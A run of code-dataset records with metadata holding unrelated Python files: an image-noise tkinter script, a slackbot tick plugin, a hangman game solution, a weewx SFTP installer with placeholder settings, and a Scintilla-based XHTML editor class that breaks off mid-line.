skiplines_int = int(skiplines)\n\n skip_pixels = spin2.get()\n skip_pixels_int = int(skip_pixels)\n\n print (slidergreen2,sliderred2,sliderblue2)\n\n\n rows = my_image.size[0]\n cols = my_image.size[1]\n\n\n px = my_image.load()\n\n for i in range(0, rows, skiplines_int):\n start = random.randint(0, rows)\n end = random.randint(0, cols)\n nub = random.randint(1, 10)\n\n if i % 2 == 0:\n start = 0\n else:\n start = 1\n\n for j in range(start, cols, nub):\n # you should have your slider code here\n # you should have your slider code here\n # you should have your slider code here\n red = random.randint(0, sliderred2)\n green = random.randint(0, slidergreen2)\n blue = random.randint(0, sliderblue2)\n '''\n if j % 2 == 0:\n red = 0\n green = 0\n blue = 0\n else:\n red = 255\n green = 255\n blue = 255\n '''\n px[i, j] = (red, green, blue)\n\n my_image.show()\n\nsliderred = Scale(root,from_=0, to=255, orient=HORIZONTAL, background='red', fg='grey')\nsliderred.grid(row=7, column=1)\nsliderblue = Scale(root,from_=0, to=255, orient=HORIZONTAL, background='blue', fg='grey')\nsliderblue.grid(row=8, column=1)\nslidergreen = Scale(root,from_=0, to=255, orient=HORIZONTAL, background='green', fg='grey')\nslidergreen.grid(row=8, column=2)\n\nspin1 = Spinbox(root, from_=1, to=10, width=3)\nspin1.grid(row=1, column=1)\nspin2 = Spinbox(root, from_=1, to=10, width=3)\nspin2.grid(row=1, column=0)\n# open button --- add this to your code\nopen_button = ttk.Button(root, text='Open Files', command=select_files)\nopen_button.grid(row=0, column=2)\n\nroot.mainloop()","sub_path":".idea/Bettercode.py","file_name":"Bettercode.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"61782518","text":"#! /usr/bin/env python\n#\n# tick.py ---\n#\n# Filename: tick.py\n# Description:\n# Author: Werther Zhang\n# Maintainer:\n# Created: Tue Oct 11 16:07:15 2016 (+0800)\n#\n\n# Change Log:\n#\n#\n\n# -*- coding: utf-8 -*-\n\nimport time\nfrom slackbot.bot import tick_task\n\ncount = 0\nnext_time=0\n\n@tick_task\ndef hello(message):\n global count\n global next_time\n now = time.time()\n if now < next_time:\n return\n return\n next_time = now + 5 # every 5 seconds\n message.send_to('werther0331', 'hello {}'.format(count))\n count += 1\n","sub_path":"slackbot/plugins/tick.py","file_name":"tick.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"284820977","text":"# Problem Set 2, hangman.py\n# Name: \n# Collaborators:\n# Time spent:\n\n# Hangman Game\n# -----------------------------------\n# Helper code\n# You don't need to understand this helper code,\n# but you will have to know how to use the functions\n# (so be sure to read the docstrings!)\nimport random\nimport string\nimport os\t#os库用来解决相对路径问题\n\nWORDLIST_FILENAME = (os.path.abspath(os.path.dirname(__file__))+\"\\\\words.txt\")\n#要求单词表文件 words.txt与.py在同一个目录\n\n\ndef load_words():\n\n\tprint(\"Loading word list from file...\")\n\t# inFile: file\n\tinFile = open(WORDLIST_FILENAME, 'r')\n\t# line: string\n\tline = inFile.readline()\n\t# wordlist: list of strings\n\twordlist = line.split()\n\tprint(\" \", len(wordlist), \"words loaded.\")\n\treturn wordlist\n\n\n\ndef choose_word(wordlist):\n\n\treturn random.choice(wordlist)\n\n# end of helper code\n\n# -----------------------------------\n\n# Load the list of words into the variable wordlist\n# so that it can be accessed from anywhere in the program\nwordlist = load_words()\n\n\ndef is_word_guessed(secret_word, letters_guessed):\n\t#对于选择的单词,如果每个字母都已经被猜中则返回True\n\tfor letter in secret_word:\n\t\tif letter not in letters_guessed:\n\t\t\treturn False\n\treturn True\n\n\n\ndef get_guessed_word(secret_word, letters_guessed):\n\t#先创建一个字符串并赋值为选择的词\n\tguessed_word = secret_word\n\tfor i in guessed_word :\n\t\tif i not in letters_guessed:\n\t\t\tguessed_word = guessed_word.replace(i,\"_ \")\n\t\t\t#对于未被猜中的字母则用_替代\n\treturn guessed_word\n\n\n\ndef get_available_letters(letters_guessed):\n\t#创建一个字母表\n\tavailable_letters = string.ascii_lowercase\n\tfor i in available_letters:\n\t\tif i in letters_guessed:\n\t\t\tavailable_letters = available_letters.replace(i,'')\n\t\t\t#已经被猜测过的字母在表中剔除\n\treturn available_letters\n\n\ndef hangman(secret_word):\n\n\t#初始化一些关键变量\n\tguesses_remaining = 6\n\twarnings_remaining = 3\n\tunique_letters = 0\t\t#字符串中不同的字母个数\n\tletters_guessed = []\n\tflag_win = False\n\t\n\tprint(\"Welcome to the game Hangman!\")\n\tprint(\"I am thinking the of a word that is \"+str(len(secret_word))+\" letters long.\")\n\tprint(\"You have \"+str(warnings_remaining)+\" warnings left.\")\n\twhile(guesses_remaining > 0 and not flag_win):\n\t#继续条件:还有机会 且 还没赢\n\t\tprint(\"----------------------------------\")\n\t\tprint(\"You have \"+str(guesses_remaining)+\" guesses left\")\n\t\tprint(\"Available letters: \"+get_available_letters(letters_guessed))\n\t\tletter_guessed = input(\"Please guess a letter: \")\n\t\tif len(letter_guessed)!=1 or letter_guessed not in get_available_letters(letters_guessed):\n\t\t#如果出现非法输入则:(如果不是一个字符也认为是非法输入)\n\t\t\tif warnings_remaining > 0:\n\t\t\t\twarnings_remaining -= 1\n\t\t\t\tif len(letter_guessed)!=1:\n\t\t\t\t\tprint(\"Oops! You need to input only a letter. You now have \"+str(warnings_remaining)+\" warnings: \")\n\t\t\t\telse:\n\t\t\t\t\tprint(\"Oops! You've already guessed that letter. You now have \"+str(warnings_remaining)+\" warnings: \")\n\t\t\t\tprint(get_guessed_word(secret_word, letters_guessed))\n\t\t\t\t#扣减警告次数\n\t\t\telse:\n\t\t\t\tprint(\"Oops! You've already guessed that letter. You have no warnings left\")\t\t\t\t\n\t\t\t\tguesses_remaining -= 1\n\t\t\t\tprint(\"so you lose one guess: \"+get_guessed_word(secret_word, letters_guessed))\n\t\t\t\t#扣减猜测次数\n\t\t\tcontinue\n\t\tletters_guessed.append(letter_guessed)\n\t\tif letter_guessed in secret_word:\n\t\t\tprint(\"Good guess!: \"+get_guessed_word(secret_word, letters_guessed))\n\t\t\tunique_letters += 1\n\t\t\t#猜对了的话,所选字符串不同的字母数+1(因为需要猜对的次数等于所选择的字符串不同字母的个数)\n\t\telse:\n\t\t\tprint(\"Oops! That letter is not in my word: \"+get_guessed_word(secret_word, letters_guessed))\n\t\t\tif letter_guessed in ['a','e','i','o']:\n\t\t\t\tguesses_remaining -= 1\t#部分元音字母多扣1次机会\n\t\t\tguesses_remaining -= 1\n\t\tflag_win = is_word_guessed(secret_word, letters_guessed)\n\t\t#判断胜负\n\tTotal_score = guesses_remaining* unique_letters\n\tif(flag_win):\n\t\tprint(\"Congratulations, you won!\")\n\t\tprint(\"Your total score for this game is: \"+str(Total_score ))\n\t\t#胜利则出分数\n\telse:\n\t\tprint(\"Sorry, you ran out of guesses. The word was \"+str(secret_word))\n\n\n# When you've completed your hangman function, scroll down to the bottom\n# of the file and uncomment the first two lines to test\n#(hint: you might want to pick your own\n# secret_word while you're doing your own testing)\n\n\n# -----------------------------------\n\n\n\ndef match_with_gaps(my_word, other_word):\n\tmyword_not_b = my_word.replace(' ','')\n\t#将被_屏蔽的字符串中的空格全部剔除\n\tif(len(myword_not_b) != len(other_word)):\n\t\t#如果两个词长度不一样就一定不同\n\t\treturn False\n\tfor i in range(len(myword_not_b)):\n\t\tif myword_not_b[i] != '_' and myword_not_b[i] != other_word[i]:\n\t\t#出现除_外不同的字母时说明两个词不匹配\n\t\t\treturn False\n\treturn True\n\n\n\ndef show_possible_matches(my_word):\n\tmatches_flag = False\n\tfor word in wordlist:\n\t\tif match_with_gaps(my_word,word):\n\t\t#根据匹配函数在字典中找到匹配的单词打印出来\n\t\t\tprint(word,end='')\n\t\t\tprint(\" \",end='')\n\t\t\tmatches_flag = True\n\tif not matches_flag:\n\t\tprint(\"No matches found\")\n\telse:\n\t\tprint(\"\")\n\n\n\ndef hangman_with_hints(secret_word):\n\t#同hangman(),增设*判断\n\tguesses_remaining = 6\n\twarnings_remaining = 3\n\tunique_letters = 0\n\tletters_guessed = []\n\tflag_win = False\n\t\n\tprint(\"Welcome to the game Hangman!\")\n\tprint(\"I am thinking the of a word that is \"+str(len(secret_word))+\" letters long.\")\n\tprint(\"You have \"+str(warnings_remaining)+\" warnings left.\")\n\twhile(guesses_remaining > 0 and not flag_win):\n\t\tprint(\"----------------------------------\")\n\t\tprint(\"You have \"+str(guesses_remaining)+\" guesses left\")\n\t\tprint(\"Available letters: \"+get_available_letters(letters_guessed))\n\t\tletter_guessed = input(\"Please guess a letter: \")\n\t\tif letter_guessed == '*':\n\t\t# * 判断,如果文件输入了*,则展示所有匹配的单词\n\t\t\tprint(\"Possible word matches are: \")\n\t\t\tshow_possible_matches(get_guessed_word(secret_word, letters_guessed))\n\t\t\tcontinue\n\t\tif len(letter_guessed)!=1 or letter_guessed not in get_available_letters(letters_guessed):\n\t\t\tif warnings_remaining > 0:\n\t\t\t\twarnings_remaining -= 1\n\t\t\t\tif len(letter_guessed)!=1:\n\t\t\t\t\tprint(\"Oops! You need to input only a letter. You now have \"+str(warnings_remaining)+\" warnings: \")\n\t\t\t\telse:\n\t\t\t\t\tprint(\"Oops! You've already guessed that letter. You now have \"+str(warnings_remaining)+\" warnings: \")\n\t\t\t\tprint(get_guessed_word(secret_word, letters_guessed))\n\t\t\telse:\n\t\t\t\tprint(\"Oops! You've already guessed that letter. You have no warnings left\")\t\t\t\t\n\t\t\t\tguesses_remaining -= 1\n\t\t\t\tprint(\"so you lose one guess: \"+get_guessed_word(secret_word, letters_guessed))\n\n\t\t\tcontinue\n\t\tletters_guessed.append(letter_guessed)\n\t\tif letter_guessed in secret_word:\n\t\t\tprint(\"Good guess!: \"+get_guessed_word(secret_word, letters_guessed))\n\t\t\tunique_letters += 1\n\t\telse:\n\t\t\tprint(\"Oops! That letter is not in my word: \"+get_guessed_word(secret_word, letters_guessed))\n\t\t\tif letter_guessed in ['a','e','i','o']:\n\t\t\t\tguesses_remaining -= 1\n\t\t\tguesses_remaining -= 1\n\t\tflag_win = is_word_guessed(secret_word, letters_guessed)\n\tTotal_score = guesses_remaining* unique_letters\n\tif(flag_win):\n\t\tprint(\"Congratulations, you won!\")\n\t\tprint(\"Your total score for this game is: \"+str(Total_score ))\n\telse:\n\t\tprint(\"Sorry, you ran out of guesses. The word was \"+str(secret_word))\n\n\n\tpass\n\n\n\n# When you've completed your hangman_with_hint function, comment the two similar\n# lines above that were used to run the hangman function, and then uncomment\n# these two lines and run this file to test!\n# Hint: You might want to pick your own secret_word while you're testing.\n\n\nif __name__ == \"__main__\":\n\t# pass\n\n\t# To test part 2, comment out the pass line above and\n\t# uncomment the following two lines.\n\t#show_possible_matches(\"t_ _ t\")\n\tsecret_word = choose_word(wordlist)\n\tmod = input(\"Which mod do you want to play?\\n 0.hangman 1.hangman_with_hints\\n\")\n\tif(mod == '1'):#两种模式可以自行选择\n\t\thangman_with_hints(secret_word)\n\telse:\n\t\thangman(secret_word)\n\n\t#pass\n\n###############\n\n\t# To test part 3 re-comment out the above lines and \n\t# uncomment the following two lines. \n\t\n\t#secret_word = choose_word(wordlist)\n\t#hangman_with_hints(secret_word)","sub_path":"P2/ps2.py","file_name":"ps2.py","file_ext":"py","file_size_in_byte":8491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"625795634","text":"# Installer for SFTPUpload\n# Copyright 2016 Chris Davies\n\nfrom setup import ExtensionInstaller\n\ndef loader():\n\treturn SFTPUploadInstaller()\n\nclass SFTPUploadInstaller(ExtensionInstaller):\n\tdef __init__(self):\n\t\tsuper(SFTPUploadInstaller, self).__init__(\n\t\t\tversion='0.1',\n\t\t\tname='sftpupload',\n\t\t\tdescription='A true secure FTP uploader for Weewx. Requires pysftp',\n\t\t\tauthor='Chris Davies',\n\t\t\tauthor_email='weewx@davies-barnard.co.uk',\n\t\t\tconfig={\n\t\t\t\t'StdReport': {\n\t\t\t\t\t\t'SFTP': {\n\t\t\t\t\t\t\t\t'skin': 'SFtp',\n\t\t\t\t\t\t\t\t'user':'yourUserName',\n 'password':'yourPassWord',\n 'server':'yourServer',\n 'path':'remotePath',\n 'max_tries': 3,\n\t\t\t\t\t\t\t\t'HTML_ROOT': 'public_html'\n\t\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t},\n\t\t\tfiles=[\n\t\t\t\t('bin/user', ['bin/user/sftpupload.py']),\n\t\t\t\t('skins/SFtp', ['skins/SFtp/skin.conf']),\n\t\t\t]\n\t\t)","sub_path":"install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"585455705","text":"from wx.stc import *\r\nfrom zoundry.appframework.global_services import getResourceRegistry\r\nfrom zoundry.appframework.services.validation.xhtmlvalidation import IZXhtmlValidationListener\r\nfrom zoundry.appframework.services.validation.xhtmlvalidation import ZXhtmlValidationMessage\r\nfrom zoundry.appframework.ui.util.clipboardutil import getTextFromClipboard\r\nfrom zoundry.appframework.ui.util.uiutil import ZMethodRunnable\r\nfrom zoundry.appframework.ui.util.uiutil import fireUIExecEvent\r\nfrom zoundry.appframework.ui.util.xhtmlvalidationutil import ZXhtmlSchemaUiUtil\r\nfrom zoundry.appframework.ui.widgets.controls.advanced.editcontrol import IZEditControl\r\nfrom zoundry.appframework.ui.widgets.controls.advanced.editcontrol import IZRichTextEditControl\r\nfrom zoundry.appframework.ui.widgets.controls.advanced.editcontrol import IZTextEditControl\r\nfrom zoundry.appframework.ui.widgets.controls.advanced.htmleditcontrol import IZXHTMLEditControl\r\nfrom zoundry.appframework.ui.widgets.controls.advanced.htmleditcontrol import ZBaseXHTMLEditControl\r\nfrom zoundry.appframework.ui.widgets.controls.advanced.htmlvalidationlist import ZXhtmlValidationReportListViewContentProvider\r\nfrom zoundry.appframework.ui.widgets.controls.advanced.htmlvalidationlist import ZXhtmlValidationReportView\r\nfrom zoundry.appframework.ui.widgets.controls.advanced.stc.stcfindreplacectx import ZStyledXhtmlEditControlFindReplaceTextContext\r\nfrom zoundry.appframework.ui.widgets.controls.advanced.stc.stcsupport import ZStcAutoCompleteHandler\r\nfrom zoundry.appframework.ui.widgets.controls.advanced.stc.stcsupport import ZStcLocator\r\nfrom zoundry.base.css.csscolor import ZCssColor\r\nfrom zoundry.base.xhtml.xhtmlio import loadXhtmlDocumentFromString\r\nimport wx #@Reimport\r\n\r\n#================================================================\r\n# REF:\r\n# http://www.yellowbrain.com/stc/index.html\r\n# http://www.flamerobin.org/dokuwiki/doku.php?id=wiki:stc\r\n#\r\n#================================================================\r\n\r\n#------------------------------\r\n# Margin marker IDs\r\n#------------------------------\r\nclass IZZStyledTextCtrlMarkers:\r\n MARKER_NONE = 0\r\n MARKER_OK = 1\r\n MARKER_WARN = 2\r\n MARKER_ERROR = 3\r\n MARKER_ARROW = 4\r\n# end IZZStyledTextCtrlMarkers\r\n\r\n\r\n#------------------------------\r\n# Scintilla xhtml text editor\r\n#------------------------------\r\nclass ZStyledXhtmlEditControl(ZBaseXHTMLEditControl, IZXhtmlValidationListener):\r\n\r\n def __init__(self, parent):\r\n ZBaseXHTMLEditControl.__init__(self, parent)\r\n\r\n self.stcCtrl = StyledTextCtrl(self, wx.NewId(), style = wx.NO_BORDER | wx.NO_FULL_REPAINT_ON_RESIZE)\r\n self.stcCtrl.CmdKeyAssign(ord(u'+'), STC_SCMOD_CTRL, STC_CMD_ZOOMIN) #$NON-NLS-1$\r\n self.stcCtrl.CmdKeyAssign(ord(u'-'), STC_SCMOD_CTRL, STC_CMD_ZOOMOUT) #$NON-NLS-1$\r\n\r\n self.autocompleteLocator = ZStcLocator(self.stcCtrl)\r\n self.autocompleteHandler = ZStcAutoCompleteHandler()\r\n self.autocompleteLocatorInfo = None\r\n\r\n self.validationReportProvider = ZXhtmlValidationReportListViewContentProvider()\r\n self.validationView = ZXhtmlValidationReportView(self, self.validationReportProvider)\r\n\r\n box = wx.BoxSizer(wx.VERTICAL)\r\n box.Add(self.stcCtrl, 3, wx.EXPAND)\r\n box.Add(self.validationView, 2, wx.EXPAND | wx.ALL, 4)\r\n self.SetAutoLayout(True)\r\n self.SetSizer(box)\r\n self.Layout()\r\n\r\n self.contentLoaded = False\r\n self._setLexer()\r\n self._setMargins()\r\n self._setMarkers()\r\n self._setStyles()\r\n self._bindStcEvents()\r\n self._bindWidgetEvents()\r\n # end __init__()\r\n\r\n def _getCapabilityIdList(self):\r\n rval = ZBaseXHTMLEditControl._getCapabilityIdList(self)\r\n rval.append(IZEditControl.ZCAPABILITY_CUT)\r\n rval.append(IZEditControl.ZCAPABILITY_COPY)\r\n rval.append(IZEditControl.ZCAPABILITY_PASTE)\r\n rval.append(IZEditControl.ZCAPABILITY_UNDO)\r\n rval.append(IZEditControl.ZCAPABILITY_REDO)\r\n rval.append(IZEditControl.ZCAPABILITY_SELECT_ALL)\r\n rval.append(IZEditControl.ZCAPABILITY_SELECT_NONE)\r\n # text editor capabilities\r\n rval.append(IZTextEditControl.ZCAPABILITY_FIND_TEXT)\r\n rval.append(IZTextEditControl.ZCAPABILITY_FINDREPLACE)\r\n\r\n # rich text editor capabilities\r\n rval.append(IZRichTextEditControl.ZCAPABILITY_BOLD)\r\n rval.append(IZRichTextEditControl.ZCAPABILITY_ITALIC)\r\n rval.append(IZRichTextEditControl.ZCAPABILITY_UNDERLINE)\r\n rval.append(IZRichTextEditControl.ZCAPABILITY_STRIKETHRU)\r\n\r\n # html domain capabilities\r\n rval.append(IZXHTMLEditControl.ZCAPABILITY_SCHEMA_AWARE)\r\n rval.append(IZXHTMLEditControl.ZCAPABILITY_VALIDATE_HTML)\r\n rval.append(IZXHTMLEditControl.ZCAPABILITY_TIDY_HTML)\r\n rval.append(IZXHTMLEditControl.ZCAPABILITY_PASTE_HTML)\r\n# rval.append(IZXHTMLEditControl.ZCAPABILITY_INSERT_IMAGE)\r\n# rval.append(IZXHTMLEditControl.ZCAPABILITY_INSERT_LINK)\r\n return rval\r\n # end _getCapabilityIdList()\r\n\r\n def _bindWidgetEvents(self):\r\n self.Bind(wx.EVT_LIST_ITEM_ACTIVATED, self.onValidationItemActivated, self.validationView.getListControl())\r\n self.Bind(wx.EVT_LIST_ITEM_SELECTED, self.onValidationItemSelected, self.validationView.getListControl())\r\n # end _bindWidgetEvents\r\n\r\n def _getStcControl(self):\r\n return self.stcCtrl\r\n # end _getStcControl()\r\n\r\n def _setLexer(self):\r\n self._getStcControl().SetLexer(STC_LEX_HTML)\r\n # end _setLexer()\r\n\r\n def _setMargins(self):\r\n self._getStcControl().SetEdgeMode(STC_EDGE_BACKGROUND)\r\n self._getStcControl().SetEdgeColumn(256)\r\n # line numbers in the margin\r\n self._getStcControl().SetMarginType(0, STC_MARGIN_NUMBER)\r\n self._getStcControl().SetMarginWidth(0, 22)\r\n\r\n self._getStcControl().SetMarginType(1, STC_MARGIN_SYMBOL)\r\n self._getStcControl().SetMarginSensitive(1, True)\r\n self._getStcControl().SetMarginSensitive(0, True)\r\n # end _setMargins()\r\n\r\n\r\n def _setMarkers(self):\r\n registry = getResourceRegistry()\r\n self._getStcControl().MarkerDefine(IZZStyledTextCtrlMarkers.MARKER_NONE, STC_MARK_EMPTY) #$NON-NLS-1$ #$NON-NLS-2$\r\n self._getStcControl().MarkerDefineBitmap(IZZStyledTextCtrlMarkers.MARKER_OK, registry.getBitmap(u\"images/common/ok16x16.gif\")) #$NON-NLS-1$\r\n self._getStcControl().MarkerDefineBitmap(IZZStyledTextCtrlMarkers.MARKER_WARN, registry.getBitmap(u\"images/common/warning16x16.gif\")) #$NON-NLS-1$\r\n self._getStcControl().MarkerDefineBitmap(IZZStyledTextCtrlMarkers.MARKER_ERROR, registry.getBitmap(u\"images/common/error16x16.gif\")) #$NON-NLS-1$\r\n self._getStcControl().MarkerDefine(IZZStyledTextCtrlMarkers.MARKER_ARROW, STC_MARK_SHORTARROW, u\"blue\", u\"yellow\") #$NON-NLS-1$ #$NON-NLS-2$\r\n # end _setMarkers()\r\n\r\n def _setStyles(self):\r\n # Make some styles, The lexer defines what each style is used for, we\r\n # just have to define what each style looks like. This set is adapted from\r\n # Scintilla sample property files.\r\n\r\n self._getStcControl().StyleClearAll()\r\n\r\n faces = { u'times': u'Times New Roman', #$NON-NLS-2$ #$NON-NLS-1$\r\n u'mono' : u'Courier New', #$NON-NLS-2$ #$NON-NLS-1$\r\n u'helv' : u'Arial', #$NON-NLS-2$ #$NON-NLS-1$\r\n u'other': u'Comic Sans MS', #$NON-NLS-2$ #$NON-NLS-1$\r\n u'size' : 10, #$NON-NLS-1$\r\n u'size2': 8, #$NON-NLS-1$\r\n }\r\n\r\n\r\n # Global default styles for all languages\r\n# self._getStcControl().StyleSetSpec(STC_STYLE_DEFAULT, u\"face:%(mono)s,size:%(size)d\" % faces) #$NON-NLS-1$\r\n# self._getStcControl().StyleSetSpec(STC_STYLE_LINENUMBER, u\"back:#EEEEEE,face:%(helv)s,size:%(size2)d\" % faces) #$NON-NLS-1$\r\n# self._getStcControl().StyleSetSpec(STC_STYLE_CONTROLCHAR, u\"face:%(other)s\" % faces) #$NON-NLS-1$\r\n# self._getStcControl().StyleSetSpec(STC_STYLE_BRACELIGHT, u\"fore:#FF0000,back:#FFFFFF,bold\") #$NON-NLS-1$\r\n# self._getStcControl().StyleSetSpec(STC_STYLE_BRACEBAD, u\"fore:#FF00FF,back:#FFFFFF,bold\") #$NON-NLS-1$\r\n\r\n#wxSTC_H_DEFAULT = stc_c.wxSTC_H_DEFAULT\r\n#wxSTC_H_TAG = stc_c.wxSTC_H_TAG\r\n#wxSTC_H_TAGUNKNOWN = stc_c.wxSTC_H_TAGUNKNOWN\r\n#wxSTC_H_ATTRIBUTE = stc_c.wxSTC_H_ATTRIBUTE\r\n#wxSTC_H_ATTRIBUTEUNKNOWN = stc_c.wxSTC_H_ATTRIBUTEUNKNOWN\r\n#wxSTC_H_NUMBER = stc_c.wxSTC_H_NUMBER\r\n#wxSTC_H_DOUBLESTRING = stc_c.wxSTC_H_DOUBLESTRING\r\n#wxSTC_H_SINGLESTRING = stc_c.wxSTC_H_SINGLESTRING\r\n#wxSTC_H_OTHER = stc_c.wxSTC_H_OTHER\r\n#wxSTC_H_COMMENT = stc_c.wxSTC_H_COMMENT\r\n#wxSTC_H_ENTITY = stc_c.wxSTC_H_ENTITY\r\n#wxSTC_H_TAGEND = stc_c.wxSTC_H_TAGEND\r\n#wxSTC_H_XMLSTART = stc_c.wxSTC_H_XMLSTART\r\n#wxSTC_H_XMLEND = stc_c.wxSTC_H_XMLEND\r\n#wxSTC_H_SCRIPT = stc_c.wxSTC_H_SCRIPT\r\n#wxSTC_H_ASP = stc_c.wxSTC_H_ASP\r\n#wxSTC_H_ASPAT = stc_c.wxSTC_H_ASPAT\r\n#wxSTC_H_CDATA = stc_c.wxSTC_H_CDATA\r\n#wxSTC_H_QUESTION = stc_c.wxSTC_H_QUESTION\r\n#wxSTC_H_VALUE = stc_c.wxSTC_H_VALUE\r\n#wxSTC_H_XCCOMMENT = stc_c.wxSTC_H_XCCOMMENT\r\n\r\n # Default\r\n self._getStcControl().StyleSetSpec(STC_H_DEFAULT, u\"fore:#000000,face:%(mono)s,size:%(size)d\" % faces) #$NON-NLS-1$\r\n self._getStcControl().StyleSetSpec(STC_H_COMMENT, u\"fore:#007F00,face:%(other)s,size:%(size)d\" % faces) #$NON-NLS-1$\r\n self._getStcControl().StyleSetSpec(STC_H_NUMBER, u\"fore:#000000,size:%(size)d\" % faces) #$NON-NLS-1$\r\n self._getStcControl().StyleSetSpec(STC_H_DOUBLESTRING, u\"fore:#000099,face:%(helv)s,size:%(size)d\" % faces) #$NON-NLS-1$\r\n self._getStcControl().StyleSetSpec(STC_H_SINGLESTRING, u\"fore:#000099,face:%(helv)s,size:%(size)d\" % faces) #$NON-NLS-1$\r\n self._getStcControl().StyleSetSpec(STC_H_TAG, u\"fore:#7F007F,bold,size:%(size)d\" % faces) #$NON-NLS-1$\r\n self._getStcControl().StyleSetSpec(STC_H_TAGEND, u\"fore:#7F007F,bold,size:%(size)d\" % faces) #$NON-NLS-1$\r\n self._getStcControl().StyleSetSpec(STC_H_TAGUNKNOWN, u\"fore:#00007f,italic,size:%(size)d\" % faces) #$NON-NLS-1$\r\n self._getStcControl().StyleSetSpec(STC_H_ATTRIBUTE, u\"fore:#00000,normal,size:%(size)d\" % faces) #$NON-NLS-1$\r\n self._getStcControl().StyleSetSpec(STC_H_ATTRIBUTEUNKNOWN, u\"fore:#007F00,italic,size:%(size)d\" % faces) #$NON-NLS-1$\r\n\r\n self._getStcControl().SetCaretForeground(u\"BLUE\") #$NON-NLS-1$\r\n # end _setStyles()\r\n\r\n def _bindStcEvents(self):\r\n # disable right click menu\r\n self._getStcControl().UsePopUp(0)\r\n id = self._getStcControl().GetId()\r\n self._getStcControl().Bind(wx.EVT_RIGHT_UP, self.onRightClick)\r\n EVT_STC_UPDATEUI(self._getStcControl(), id, self.onSelectionChange)\r\n EVT_STC_UPDATEUI(self._getStcControl(), id, self.onUpdateUI)\r\n EVT_STC_CHANGE(self._getStcControl(), id, self.onChange)\r\n\r\n EVT_STC_CHARADDED(self._getStcControl(), id, self.onCharAdded)\r\n EVT_STC_USERLISTSELECTION(self._getStcControl(), id, self.onUserListSelection)\r\n wx.EVT_KEY_DOWN(self._getStcControl(), self.onKeyPressed)\r\n EVT_STC_MARGINCLICK(self._getStcControl(), id, self.onMarginClick)\r\n## EVT_STC_START_DRAG(self._getStcControl(), id, self.OnStartDrag)\r\n## EVT_STC_DRAG_OVER(self._getStcControl(), id, self.OnDragOver)\r\n# EVT_STC_DO_DROP(self._getStcControl(), id, self.OnDoDrop)\r\n## EVT_STC_MARGINCLICK(self._getStcControl(),id, self.OnMarginClick)\r\n\r\n\r\n # end _bindStcEvents()\r\n\r\n def _matchBraces(self):\r\n p1 = self._getStcControl().GetCurrentPos()\r\n c1 = self._getStcControl().GetCharAt(p1)\r\n p2 = p1 - 1\r\n if p2 < 0:\r\n p2 = 0\r\n c2 = self._getStcControl().GetCharAt(p2)\r\n openBrace = [ord(u\"<\"), ord(u\"\\\"\"), ord(u\"'\")] #$NON-NLS-1$ #$NON-NLS-2$ #$NON-NLS-3$\r\n closeBrace = [ord(u\">\"),ord(u\"\\\"\"), ord(u\"'\")] #$NON-NLS-1$ #$NON-NLS-2$ #$NON-NLS-3$\r\n if (c2 in openBrace or c2 in closeBrace) or (c1 in openBrace or c1 in closeBrace):\r\n p = p1\r\n if c2 in openBrace or c2 in closeBrace:\r\n p = p - 1\r\n q = self._getStcControl().BraceMatch(p)\r\n if q == STC_INVALID_POSITION:\r\n self._getStcControl().BraceBadLight(p);\r\n else:\r\n self._getStcControl().BraceHighlight(p,q);\r\n else:\r\n self._getStcControl().BraceBadLight(STC_INVALID_POSITION);\r\n # end _matchBraces\r\n\r\n def onKeyPressed(self, event):\r\n self._resetMarkerHighLighting()\r\n if self._getStcControl().CallTipActive():\r\n self._getStcControl().CallTipCancel()\r\n key = event.GetKeyCode()\r\n event.Skip()\r\n if key == 32 and event.ControlDown():\r\n if event.ShiftDown():\r\n self._showCallTip()\r\n else:\r\n self._showXhtmlAutoComplete(False)\r\n # end OnKeyPressed\r\n\r\n def _showCallTip(self):\r\n pos = self._getStcControl().GetCurrentPos()\r\n text = self.autocompleteHandler.getCallTip(self.autocompleteLocator)\r\n if text:\r\n self._getStcControl().CallTipSetBackground(u\"yellow\")#$NON-NLS-1$\r\n self._getStcControl().CallTipShow(pos, text)\r\n # end _showCallTip\r\n\r\n def _showXhtmlAutoComplete(self, autoHide=False):\r\n if self._getStcControl().CallTipActive():\r\n self._getStcControl().CallTipCancel()\r\n\r\n pos = self._getStcControl().GetCurrentPos() #@UnusedVariable\r\n if not self._getStcControl().AutoCompActive():\r\n (lst, self.autocompleteLocatorInfo) = self.autocompleteHandler.getAutocompleteList(self.autocompleteLocator)\r\n\r\n if lst and len(lst) > 0:\r\n lst.sort() # Python sorts are case sensitive\r\n self._getStcControl().AutoCompSetAutoHide(autoHide)\r\n self._getStcControl().AutoCompSetIgnoreCase(False) # so this needs to match\r\n self._getStcControl().AutoCompSetSeparator(ord(u\"|\"))#$NON-NLS-1$\r\n #self.AutoCompShow(0, u\"|\".join(lst)) #$NON-NLS-1$\r\n try:\r\n self._getStcControl().UserListShow(self.autocompleteLocatorInfo.locationType, u\"|\".join(lst)) #$NON-NLS-1$\r\n except:\r\n pass\r\n # end _showXhtmlAutoComplete()\r\n\r\n def onCharAdded(self, event): #@UnusedVariable\r\n p = self._getStcControl().GetCurrentPos()\r\n # if autocomp is active and the char sequence is \" 1 and self._getStcControl().GetCharAt(p-1) == ord(u\"/\") and self._getStcControl().GetCharAt(p-2) == ord(u\"<\"): #$NON-NLS-1$ #$NON-NLS-2$\r\n self._getStcControl().AutoCompCancel()\r\n\r\n if not self._getStcControl().AutoCompActive():\r\n # xhtml\r\n if p > 0 and self._getStcControl().GetCharAt(p-1) == ord(u\"<\"): #$NON-NLS-1$\r\n self._showXhtmlAutoComplete(True)\r\n elif p > 1 and self._getStcControl().GetCharAt(p-1) == ord(u\"/\") and self._getStcControl().GetCharAt(p-2) == ord(u\"<\"): #$NON-NLS-1$ #$NON-NLS-2$\r\n self._showXhtmlAutoComplete(True)\r\n # http://\r\n elif p > 8 and (self._getStcControl().GetTextRange(p-7,p).lower() == u\"http://\" or self._getStcControl().GetTextRange(p-8,p).lower() == u\"https://\") : #$NON-NLS-1$ #$NON-NLS-2$\r\n lst = 